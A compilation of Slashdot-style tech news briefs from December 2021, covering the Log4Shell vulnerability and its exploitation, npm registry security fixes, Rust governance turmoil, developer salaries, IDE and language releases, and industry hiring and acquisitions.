An anonymous reader quotes a report from ZDNet: The Belgian Ministry of Defense has confirmed a cyberattack on its networks that involved the Log4j vulnerability. In a statement, the Defense Ministry said it discovered an attack on its computer network with internet access on Thursday. They did not say if it was a ransomware attack but explained that "quarantine measures" were quickly put in place to "contain the infected elements." "Priority was given to the operability of the network. Monitoring will continue. Throughout the weekend, our teams were mobilized to contain the problem, continue our operations and alert our partners," the Defense Ministry said. "This attack follows the exploitation of the Log4j vulnerability, which was made public last week and for which IT specialists around the world are jumping into the breach. The Ministry of Defense will not provide any further information at this stage."

Multiple reports from companies like Google and Microsoft have indicated that government hacking groups around the world are leveraging the Log4j vulnerability in attacks. [...] Centre for Cybersecurity Belgium spokesperson Katrien Eggers told ZDNet that they too sent out a warning to Belgian companies about the Apache Log4j software issue, writing that any organization that had not already taken action should "expect major problems in the coming days and weeks." "Because this software is so widely distributed, it is difficult to estimate how the discovered vulnerability will be exploited and on what scale," the Centre for Cybersecurity Belgium said, adding that any affected organizations should contact them. "It goes without saying that this is a dangerous situation."

Colleagues across Ubisoft have names for the procession of developers who have departed over the past 18 months: "the great exodus" and "the cut artery." Across the company's global network of studios, which at 20,000-plus employees is one of gaming's largest workforces, many developers have decided it's time to quit. And many of their colleagues describe a flow of goodbyes that they've never seen before. Axios reports: Top-name talent is leaving, with at least five of the top 25-credited people from the company's biggest 2021 game, Far Cry 6, already gone. Twelve of the top 50 from last year's biggest Ubisoft release, Assassin's Creed Valhalla, have left too. (A 13th recently returned.) Also out are midlevel and lower-level workers as headcounts drop, particularly in Ubisoft's large and normally growing Canadian studios. LinkedIn shows Ubisoft's Montreal and Toronto studios each down at least 60 total workers in the last six months. Two current developers tell Axios the departures have stalled or slowed projects. One developer recently said a colleague currently at Ubisoft contacted them to solve an issue with a game, because no one was still there who knew the system.

Interviews with a dozen current and former Ubisoft developers cite a range of factors for the departures, including low pay, an abundance of competitive opportunities, frustration at the company's creative direction, and unease at Ubisoft's handling of a workplace misconduct scandal that flared in mid-2020. One developer with more than a decade of experience at Ubisoft before recently leaving said the company is "an easy target for recruiters," given the company's myriad issues. Said another now-former Ubisoft worker who was disappointed by directives from the company's Paris HQ: "There's something about management and creative scraping by with the bare minimum that really turned me away." Many spoke fondly of much of their time at the company, and one said they'd even consider returning, but the past year and a half was a breaking point. "Management says it's on top of it, telling Axios that attrition is up but that the company has hired 2,600 workers since April," the report adds.

"A spokesperson noted that questions in a recent companywide survey, about whether employees are happy at the company and would 'recommend Ubisoft as a great place to work,' returned a score of 74, which they said was in line with the industry average."

Google's open-source team said they scanned Maven Central, today's largest Java package repository, and found that 35,863 Java packages use vulnerable versions of the Apache Log4j library. From a report: This includes Java packages that use Log4j versions vulnerable to the original Log4Shell exploit (CVE-2021-44228) and a second remote code execution bug discovered in the Log4Shell patch (CVE-2021-45046). James Wetter and Nicky Ringland, members of the Google Open Source Insights Team, said in a report today that typically when a major Java security flaw is found, it typically tends to affect only 2% of the Maven Central index. However, the 35,000 Java packages vulnerable to Log4Shell account to roughly 8% of the Maven Central total of ~440,000, a percentage the two described using just one word -- "enormous." But since the vulnerability was disclosed last week, Wetter and Ringland said the community has responded positively and has already fixed 4,620 of the 35,863 packages they initially found vulnerable. This number accounts to 13% of all the vulnerable packages.

Oracle is expected to pay more than $30 billion including debt for electronic-medical-records company Cerner, WSJ reported Monday, citing people familiar with the matter. From a report: The all-cash deal is expected to be announced later Monday and value Cerner at about $95 a share, one of the people said.

David Heinemeier Hansson is the creator of Ruby on Rails (as well as the co-founder and CTO of Basecamp, makers of the email software HEY). But he says Wednesday's release of version 7.0 is the version he's been longing for, "The one where all the cards are on the table. No more tricks up our sleeves. The culmination of years of progress on five different fronts at once." The backend gets some really nice upgrades, especially with the encryption work that we did for HEY, so your data can be encrypted while its live in the database.... But it's on the front end things have made a quantum leap. We've integrated the Hotwire frameworks of Stimulus and Turbo directly as the new defaults, together with that hot newness of import maps, which means you no longer need to run the whole JavaScript ecosystem enchilada in your Ruby app...

The part that really excites me about this version, though, is how much closer it brings us to the ideal of The One Person Framework. A toolkit so powerful that it allows a single individual to create modern applications upon which they might build a competitive business. The way it used to be... Rails 7 seeks to be the wormhole that folds the time-learning-shipping-continuum, and allows you to travel grand distances without knowing all the physics of interstellar travel. Giving the individual rebel a fighting chance against The Empire....

The key engine powering this assault is conceptual compression. Like a video codec that throws away irrelevant details such that you might download the film in real-time rather than buffer for an hour. I dedicated an entire RailsConf keynote to the idea...

[I]f there ever was an opening, ever was a chance that we might at least tilt the direction of the industry, now is it.

What a glorious time to be working in web development.

theodp writes: Out of the box, does your programming language support Chemical Formulas & Chemical Reactions? Making Videos from Images & Videos? Integrals? Real Numbers? Graph Trees? Leap Seconds? Bio Sequences? Flight Data? Vector Displacement Plots? Lighting? Machine Learning? Tracking Robots? Notebooks? Creating, Deploying and Grading Quizzes? Analysis of Email Threads? Access to 2,249 User-Defined Functions? NFTs?

These are just some of the feature upgrades Stephen Wolfram touched upon as announced the launch of Version 13 of Wolfram Language and Mathematica in a Dec. 13th blog post (for more, see What's New in Mathematica 13). Sign up for free access to Wolfram Cloud Basic here, kids! So, is Wolfram the "smartest programming language in the room"?

Previously, one assumption about the 10 out of 10 Log4j security vulnerability was that it was limited to exposed vulnerable servers. We were wrong. The security company Blumira claims to have found a new, exciting Log4j attack vector. ZDNet reports: According to Blumira, this newly-discovered Javascript WebSocket attack vector can be exploited through the path of a listening server on their machine or local network. An attacker can simply navigate to a website and trigger the vulnerability. Adding insult to injury, WebSocket connections within the host can be difficult to gain deep visibility into. That means it's even harder to detect this vulnerability and attacks using it. This vector significantly expands the attack surface. How much so? It can be used on services running as localhost, which are not exposed to a network. This is what we like to call a "Shoot me now" kind of problem. Oh, and did I mention? The client itself has no direct control over WebSocket connections. They can silently start when a webpage loads. Don't you love the word "silently" in this context? I know I do.

In their proof-of-concept attack, Blumira found that by using one of the many Java Naming and Directory Interface (JNDI) exploits that they could trigger via a file path URL using a WebSocket connection to machines with an installed vulnerable Log4j2 library. All that was needed to trigger success was a path request that was started on the web page load. Simple, but deadly. Making matters worse, it doesn't need to be localhost. WebSockets allow for connections to any IP. Let me repeat, "Any IP" and that includes private IP space.

Next, as the page loads, it will initiate a local WebSocket connection, hit the vulnerable listening server, and connect out over the identified type of connection based on the JNDI connection string. The researchers saw the most success utilizing Java Remote Method Invocation (RMI). default port 1099., although we are often seeing custom ports used. Simply port scanning, a technique already in the WebSocket hacker handbook, was the easiest path to a successful attack. Making detecting such attacks even harder, the company found "specific patterns should not be expected as it is easy to trigger traffic passively in the background." Then, an open port to a local service or a service accessible to the host is found, it can then drop the JNDI exploit string in path or parameters. "When this happens, the vulnerable host calls out to the exploit server, loads the attacker's class, and executes it with java.exe as the parent process." Then the attacker can run whatever he wants. Blumira suggests users "update all local development efforts, internal applications, and internet-facing environments to Log4j 2.16 as soon as possible, before threat actors can weaponize this exploit further," reports ZDNet.

"You should also look closely at your network firewall and egress filtering. [...] In particular, make sure that only certain machines can send out traffic over 53, 389, 636, and 1099 ports. All other ports should be blocked." The report continues: "Finally, since weaponized Log4j applications often attempt to call back home to their masters over random high ports, you should block their access to such ports. "

Apple announced that it has officially released Swift Playgrounds 4. The tech giant first announced the upcoming launch of the new software at WWDC earlier this year. From a report: With this latest launch, the software now lets users build iPhone and iPad apps with SwiftUI directly on their iPad. It also allows you to preview apps in real time as you make changes to your app. Apple notes that developers are now able to upload their finished app to the App Store with its "App Store Connect" integration. "Swift Playgrounds is the best and easiest way to learn how to code," Apple said in a blog post. "Code is immediately reflected in the live preview as you build apps, and you can run your apps full screen to test them out. A new open project format based on Swift packages can be opened and edited in Swift Playgrounds for iPad, as well as within Xcode on Mac, offering you even more versatility to develop apps across iPad and Mac."

New submitter segaboy81 writes: In 2001 the Manifesto for Agile Software Development was born, and it took the software engineering world by storm. Linux, Windows, Facebook, AAA games, and just about everything else, adheres to this manifesto in some form or another. It is a paradigm that allows teams to work collaboratively on projects in the most effective and streamlined way possible. However, EA may not have gotten the memo. According to a blogpost by former EA developer Adam Berg, different teams take very different approaches to development with one team in particular being especially slow to progress. Adam recounts his experience on the FIFA team where he worked on the Wii, PS Vita, and Nintendo 3DS ports of the game: "I often worked in the realm of competition logic. Testing changes here could mean progressing through several seasons of career mode in order to test out a change. No joke, it would take an entire day to change 3 lines of code and know that it actually worked correctly."

"In 2022 we will very likely see the experimental Rust programming language support within the Linux kernel mainlined," writes Phoronix, citing patches sent out Monday "introducing the initial support and infrastructure around handling of Rust within the kernel."

This summer saw the earlier patch series posted for review and discussion around introducing Rust programming language support in the Linux kernel to complement its longstanding C focus. In the months since there has been more progress on enabling Rust for the Linux kernel development, Linus Torvalds is not opposed to it, and others getting onboard with the effort. Rust for the Linux kernel remains of increasing interest to developers over security concerns with Rust affording more memory safety protections, potentially lowering the barrier to contributing to the kernel, and other related benefits....

Miguel Ojeda sent out the "v2" patches for Rust support in the kernel. With these updated packages, the Rust code is now relying on stable Rust releases rather than the beta compiler state previously, new modularization options added, stricter code enforcements, extra Rust compiler diagnostics enabled, new abstractions for in-kernel use, and other low-level code improvements.

Red Hat is also now joining Arm, Google, and Microsoft in voicing their support for Rust code within the Linux kernel.
ZDNet contributing editor Steven J. Vaughan-Nichols also expects the first Rust code in Linux's kernel sometime in 2022: As Ryan Levick, a Microsoft principal cloud developer advocate, explained, "Rust is completely memory safe." Since roughly two-thirds of security issues can be traced back to handling memory badly, this is a major improvement. In addition, "Rust prevents those issues usually without adding any runtime overhead," Levick said.

A newly discovered zero-day vulnerability in the widely used Java logging library Apache Log4j is easy to exploit and enables attackers to gain full control of affected servers. ZDNet reports: Tracked as CVE-2021-44228, the vulnerability is classed as severe and allows unauthenticated remote code execution as the user running the application utilizes the Java logging library. CERT New Zealand warns that it's already being exploited in the wild. CISA has urged users and administrators to apply the recommended mitigations "immediately" in order to address the critical vulnerabilities. Systems and services that use the Java logging library, Apache Log4j between versions 2.0 and 2.14.1 are all affected, including many services and applications written in Java. The vulnerability was first discovered in Minecraft but researchers warn that cloud applications are also vulnerable. It's also used in enterprise applications and it's likely that many products will be found to be vulnerable as more is learned about the flaw. Slashdot reader alfabravoteam shares an excerpt from a blog post by researchers a LunaSec, warning that "anybody using Apache Struts is likely vulnerable." From the report: Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We're calling it "Log4Shell" for short (CVE-2021-44228 just isn't as memorable). The 0-day was tweeted along with a POC posted on GitHub. [...] This has been published as CVE-2021-44228 now.

Many, many services are vulnerable to this exploit. Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable. Anybody using Apache Struts is likely vulnerable. We've seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach. Many Open Source projects like the Minecraft server, Paper, have already begun patching their usage of log4j [to log4j-2.15.0-rc1].

InfoWorld reports reveals this year's highest-paying software developer roles according to Robert Half's 2022 Salary Guide (which uses research conducted this summer on America's average salary range for the 50th and 75th percentile of applicants): The highest paying non-C-suite role in 2021 is the cloud architect. Organizations are looking for talented engineers to guide their digital transformation efforts.

Cloud/network architect: $153,750-$180,500
Applications architect: $150,500-$180,250

Software developer job titles have proliferated in recent years, and there is a clear need for mobile and applications developers, who get paid on average far better than their colleagues still working on mainframes.

Software and applications manager: $142,500-$166,250
Mobile applications developer: $137,250-$163,750
Senior software engineer: $135,250-$162,250
Software engineer: $124,500-$147,250
Software developer: $122,250-$142,750
Developer/programmer analyst: $112,500-$133,750

Developers responsible solely for web applications get paid on a slightly different scale than standard software developer job titles.

Senior web developer: $128,750-$151,000
Web developer: $111,000-$131,500
Front-end developer: $93,250-$107,750
The salary guide's web page also offers a search form that lets you adjust salaries to a selected cities (also showing what the lower salaries would be in the 25th percentile for applications new to the role and still acquiring relevant skills).

The page calls tech-sector recruiting "especially active," with employers hiring tech professionals "at or beyond pre-pandemic levels." In fact, 52% of tech employers said they were adding new positions, with 49% offering signing bonuses to new employees, and hiring is especially strong in areas like cloud services, AI/machine learning, and data analysis.

One perk being offered more frequently by tech-oriented businesses: unlimited time off.

I Programmer writes: December 1st is much anticipated among those who like programming puzzles. It is time to start collecting stars by solving small puzzles on the Advent of Code website with the goal of amassing 50 stars by Christmas Day, December 25th. Raku has also opened its advent calendar and there's a brand new Bekk Christmas blog with informational content on multiple topics... At the time of writing we are only 10.5 hours into Advent of Code's Day 1, almost 50,000 users have completed both puzzles and another 8,484 have completed the first. [Some programmers are even livestreaming their progress on Twitch, or sharing their thoughts (and some particuarly creative solutions) in the Advent of Code subreddit.]

We can credit Perl with pioneering the idea of a programming advent calendar with daily articles with a festive theme and the Raku Advent Calendar now continues the tradition. Now in its 13th year, but only the third with its new name this year's first advent post solves a problem faced by Santa of creating thumbnails of approaching 2 billion images...
Smashing magazine has pulled together its own exhaustive list of additional geek-themed advent calendars. Some of the other highlights:

• The beloved site "24 Pull Requests" has relaunched for 2021, daring participants to make 24 pull requests before December 24th. (The site's tagline is "giving back to open source for the holidays.") Over the years 26,465 contributors (as well as 25,738 organizations) have already participated through the site.

• The Advent of JavaScript and Advent of CSS sites promise 24 puzzles delivered by email (though you'll have to pay if you also want them to email you the solutions!)

• This year also saw daily challenges from the sixth annual Code Security advent calendar being announced on Twitter, while TryHackMe.com has its own set of cybersecurity puzzles (and even a few prizes).

On Monday JetBrains (creators of the Kotlin programming language and makers of the integrated development environment IntelliJ IDEA) made an announcement: a preview for a lightweight new multi-language IDE called Fleet using IntelliJ's code-processing engine with a distributed IDE architecture and a reimagined UI.

By Friday they'd received an "overwhelming" number of requests, and announced the preview program had stopped accepting new requests. ("To subscribe for updates and the public preview announcement at jetbrains.com/fleet or follow @JetBrains_Fleet on Twitter.")

They'd received 80,000 requests in just the first 30 hours, reports Visual Studio magazine: Although JetBrains didn't even mention VS Code in its Nov. 28 announcement, many media pundits immediately characterized it along the lines of an "answer to Visual Studio Code," a "response to Visual Studio Code," a "competitor to Visual Studio Code" and so on...

"When you first launch Fleet, it starts up as a full-fledged editor that provides syntax highlighting, simple code completion, and all the things you'd expect from an editor," JetBrains said. "But wait, there's more! Fleet is also a fully functional IDE bringing smart completion, refactorings, navigation, debugging, and everything else that you're used to having in an IDE — all with a single button click."
"It starts up in an instant so you can begin working immediately..." boasts the Fleet web page, adding that Fleet "is designed to automatically detect your project configuration from the source code, maximizing the value you get from its smart code-processing engine while minimizing the need to configure the project in the IDE." And it also offers "project and context aware code completion, navigation to definitions and usages, on-the-fly code quality checks, and quick-fixes..."

Fleet also offers a collaborative environment allowing developers to work together — not just sharing the editor, but also terminals and debugging sessions. (There's even a diff view for reviewing changes.) "Others can connect to a collaboration session you initiate on your machine, or everyone can connect to a shared remote dev environment," explains Fleet's web page. "It supports a number of remote work scenarios and can be run locally on the developer's computer, in the cloud, or on a remote server," reports SD Times. (And Fleet's home page says soon it will even run in Docker containers configured with an appropriate environment for your project.)

SD Times adds that Fleet "currently supports Java, Kotlin, Go, Python, Rust, and JavaScript. The company plans to extend support to cover PHP, C++, C#, and HTML, which are the remaining languages that have IntelliJ IDEs." It's multi-platform — running on Linux, MacOS, or Windows — and Fleet's web page promises "a familiar and consistent user experience" offering one IDE for the many different technologies you might end up using.

And yes, there's a dark theme.

The prevailing narrative about tech workers assumes that they have more power than ever before. This even has a term -- the Great Resignation. But at the booming, much-revered payments company Stripe, some applicants have found themselves accepting job offers only to learn they have been rescinded without warning. From a report: Protocol spoke with two Stripe candidates who received either verbal or written offers from the company and then had those offers revoked because of "shifting business priorities." (We reviewed their communications with Stripe recruiters, including the offer letter, to confirm the candidates' stories). Protocol also spoke with a former Stripe recruiter who described the company as embracing a "hire and fire" mentality and constantly shifting priorities and reorganizing staff. All three of these sources were granted anonymity for fear of repercussions by their current and potential future employers. Protocol also reviewed multiple online complaints detailing similar rescinded offers; the most prominent of these complaints was posted on Hacker News and received a rousing defense of Stripe from Coinbase CEO Brian Armstrong.

"We want everyone who interacts with Stripe during a recruiting process to be treated professionally and with respect. We value feedback and are always looking for ways to improve our recruiting experience," a Stripe spokesperson wrote to Protocol. Stripe, which has the highest valuation of any private, venture-backed tech company in the U.S., has grown so rapidly over the last few years that many engineers and other tech workers see it as one of the most desirable, successful places to work. The former recruiter interviewed by Protocol said that she chose the job over offers at Google and two other tech companies, in part because of the extremely positive and enthusiastic way the company was sold to her and because of Stripe's reputation in the industry.

How many members of your team are so irreplaceable that if they were hit by a bus, your project would grind to a halt?

For PHP, that number is: two. (According to a post by PHP contributor Joe Watkins earlier this year that's now being cited in Mike Melanson's "This Week in Programming" column.) "Maybe as few as two people would have to wake up this morning and decide they want to do something different with their lives in order for the PHP project to lack the expertise and resources to move it forward in its current form, and at current pace," Watkins wrote at the time, naming Dmitry Stogov and Nikita Popov as those two. Well, last week, Nikita Popov was thankfully not hit by a bus, but he did decide to move on from his role with PHP to instead focus his activities on LLVM.

Also thankfully, Watkins' article earlier this year opened some eyes to the situation at hand and, as he writes in a follow-up article this week, JetBrains (Popov's employer) reached out to him at the time regarding starting a PHP Foundation. This week, with Popov's departure, the PHP Foundation was officially launched with the goal of funding part/full-time developers to work on the PHP core in 2022. At launch, the PHP Foundation will count 10 companies — Automattic, Laravel, Acquia, Zend, Private Packagist, Symfony, Craft CMS, Tideways, PrestaShop, and JetBrains — among its backers, with an expectation to raise $300,000 per year, and with JetBrains contributing $100,000 annually. Alongside that, the foundation is being launched using foundation-as-a-service provider Open Collective, and just under 700 contributors have already raised more than $40,000 for the foundation.

One of the key benefits to creating a foundation, rather than sticking with the status quo, goes beyond increasing the bus factor — it diversifies the influences on PHP. Watkins points out that, for much of the history of PHP, Zend, the employer of Dmitry Stogov, has been a primary financial backer, and as such has had some amount of influence on the language's direction. Similarly, JetBrains had increased influence during its time employing Popov on PHP."To say they have not influenced the direction of the language as a whole would just not be true...." While Watkins says that everything has been above board and gone through standard processes to ensure so, influence is nonetheless indisputable, and that "The Foundation represents a new way to push the language forward..."

The current RFC process, JetBrains writes, "will not change, and language decisions will always be left to the PHP Internals community."
And in addition, Watkins adds, "It provides us the mechanism by which to raise the bus factor, so that we never face the problems we face today, and have faced in the past."

On Monday morning the moderation team for the Rust programming language "resigned effective immediately," reports The New Stack: The resignation was tendered via a pull request on GitHub, wherein team member Andrew Gallant wrote that the team resigned "in protest of the Core Team placing themselves unaccountable to anyone but themselves."

According to the page describing Rust governance, the moderation team's purpose is to do just that — to help "uphold the code of conduct and community standards" — and according to the resignation letter, they are unable to do so, with the Core Team seemingly being outside of those bounds. "As a result of such structural unaccountability, we have been unable to enforce the Rust Code of Conduct to the standards the community expects of us and to the standards we hold ourselves to," Gallant continues, before making four specific recommendations to the Rust community as to how to move forward.

First, Gallant writes that the Rust community should "come to a consensus on a process for oversight over the Core Team," which he says is currently "answerable only to themselves." Next, the outgoing team recommends that the "replacement for the Mod Team be made by Rust Team Members not on the Core Team," and that this future team "with advice from Rust Team Members, proactively decide how best to handle and discover unhealthy conflict among Rust Team Members," with "professional mediation" also suggested. The final point, which they say is unrelated, is that the next team should "take special care to keep the team of a healthy size and diversity, to the extent possible," something they failed to do themselves. To that point, the outgoing team is just three members, Andre Bogus, Andrew Gallant, and Matthieu M...

The former team concludes their resignation letter, writing that "we have avoided airing specific grievances beyond unaccountability" because they are choosing "to maintain discretion and confidentiality" and that the Rust community and their replacements "exercise extreme skepticism of any statements by the Core Team (or members thereof) claiming to illuminate the situation."
"Our relationship with Core has been deteriorating for months," they add in a thread on Reddit (where the subReddit's moderators have since locked out comments "in light of the volatile nature of this thread.")

There's just one more official update. Thursday former Rust moderation team member Andrew Gallant tweeted the URL to a new post which has now appeared on the "Inside Rust blog" — titled "In response to the moderation team resignation." The post reads: As top-level team leads, project directors to the Foundation, and core team members, we are actively collaborating to establish next steps after the statement from the Rust moderation team. While we are having ongoing conversations to share perspectives on the situation, we'd like to collectively state that we are all committed to the continuity and long term health of the project.

Updates on next steps will be shared with the project and wider community over the next few weeks. In the meantime, we are grateful to the interim moderators who have stepped up to provide moderation continuity to the project.

In 2020 Microsoft's GitHub acquired NPM (makers of the default package manager for Node.js). The company's web page boasts that npm "is a critical part of the JavaScript community and helps support one of the largest developer ecosystems in the world."

But now BleepingComputer reports on two security flaws found (and remediated) in its software registry. Names of private npm packages on npmjs.com's 'replica' server (consumed by third-party services) were leaked — but in addition, a second flaw could've allowed attackers "to publish new versions of any existing npm package that they do not own or have rights to, due to improper authorization checks."

In a blog post this week GitHub's chief security officer explained the details: During maintenance on the database that powers the public npm replica at replicate.npmjs.com, records were created that could expose the names of private packages. This briefly allowed consumers of replicate.npmjs.com to potentially identify the names of private packages due to records published in the public changes feed. No other information, including the content of these private packages, was accessible at any time. Package names in the format of @owner/package for private packages created prior to October 20 were exposed between October 21 13:12:10Z UTC and October 29 15:51:00Z UTC. Upon discovery of the issue, we immediately began work on implementing a fix and determining the scope of the exposure. On October 29, all records containing private package names were removed from the replication database. While these records were removed from the replicate.npmjs.com service on this date, the data on this service is consumed by third-parties who may have replicated the data elsewhere. To prevent this issue from occuring again, we have made changes to how we provision this public replication database to ensure records containing private package names are not generated during this process.

Second, on November 2 we received a report to our security bug bounty program of a vulnerability that would allow an attacker to publish new versions of any npm package using an account without proper authorization. We quickly validated the report, began our incident response processes, and patched the vulnerability within six hours of receiving the report.

We determined that this vulnerability was due to inconsistent authorization checks and validation of data across several microservices that handle requests to the npm registry. In this architecture, the authorization service was properly validating user authorization to packages based on data passed in request URL paths. However, the service that performs underlying updates to the registry data determined which package to publish based on the contents of the uploaded package file. This discrepancy provided an avenue by which requests to publish new versions of a package would be authorized for one package but would actually be performed for a different, and potentially unauthorized, package. We mitigated this issue by ensuring consistency across both the publishing service and authorization service to ensure that the same package is being used for both authorization and publishing.

This vulnerability existed in the npm registry beyond the timeframe for which we have telemetry to determine whether it has ever been exploited maliciously. However, we can say with high confidence that this vulnerability has not been exploited maliciously during the timeframe for which we have available telemetry, which goes back to September 2020.
BleepingComputer adds: Both announcements come not too long after popular npm libraries, 'ua-parser-js,' 'coa,' and 'rc' were hijacked in a series of attacks aimed at infecting open source software consumers with trojans and crypto-miners. These attacks were attributed to the compromise of npm accounts [1, 2] belonging to the maintainers behind these libraries.

None of the maintainers of these popular libraries had two-factor authentication (2FA) enabled on their accounts, according to GitHub. Attackers who can manage to hijack npm accounts of maintainers can trivially publish new versions of these legitimate packages, after contaminating them with malware. As such, to minimize the possibility of such compromises from recurring in near future, GitHub will start requiring npm maintainers to enable 2FA, sometime in the first quarter of 2022.

GitHub's annual report on its user community "combined telemetry data from over four million repositories with direct survey from over 12,000 developers to identify current trends among software development companies and open-source projects," reports InfoQ.

ZDNet notes the data shows that remote developers "aren't planning to go back to the office." Before the pandemic, only 41% of developers worked at an office either full-time or part-time, but of the 12,000 surveyed in GitHub's 2021 State of the Octoverse report, just 10.7% expect to go back to the office after the pandemic ends... Pre-pandemic, 28.1% of developers had hybrid arrangements but after the pandemic, 47.8% expect some hybrid arrangements. Before the pandemic, 26.5% worked in places where all workers were remote. Now, 38.8% expect to be fully remote.
ZDNet also highlighted some other general statistics: GitHub says it now has 73 million developer users and that it gained 16 million new users in 2021. Users created 61 million new repositories and there were 170 million pull requests that got merged into projects... One of the biggest projects on GitHub is the container software Docker, which has a whopping 632,000 contributors from 215 countries and consists of 49,593 packages.
That's more than a magnitude larger than the estimated number of Linux contributors — and implies that for every 117 developers now on GitHub, there was one who contributed to Docker.

Meanwhile, 2021's most popular language rankings for GitHub are the same as 2020, with one exception: Shell has risen one position to become the 8th most popular language, edging out C (which now ranks as the 9th most popular language).

And InfoQ summarized some other interesting statistics from GitHub's report:

• Good, reliable, and up-to-date documentation can boost productivity by 50%.

• Documentation is often under-invested.

• The number of pull requests merged within the workday goes down by 17% with each additional reviewer.

The U.S. General Services Administration said Friday that the Defense Department has solicited bids from Amazon, Google, Microsoft and Oracle for cloud contracts. From a report: The outreach comes after the Pentagon set aside a highly contested $10 billion contract that Microsoft had won and Amazon had challenged. The value of the new contracts is not known, but the Defense Department estimates it could run into the multiple billions of dollars. The new effort, known as Joint Warfighting Cloud Capability, or JWCC, appears like it will bolster the top global cloud infrastructure providers, Amazon and Microsoft, although it could also provide more credibility to two smaller entities.

"The Government anticipates awarding two IDIQ contracts -- one to Amazon Web Services (AWS) and one to Microsoft Corporation (Microsoft) -- but intends to award to all Cloud Service Providers (CSPs) that demonstrate the capability to meet DoD's requirements," the GSA said in its announcement. An indefinite delivery, indefinite quantity, or IDIQ, contract includes an indefinite amount of services for a specific period of time.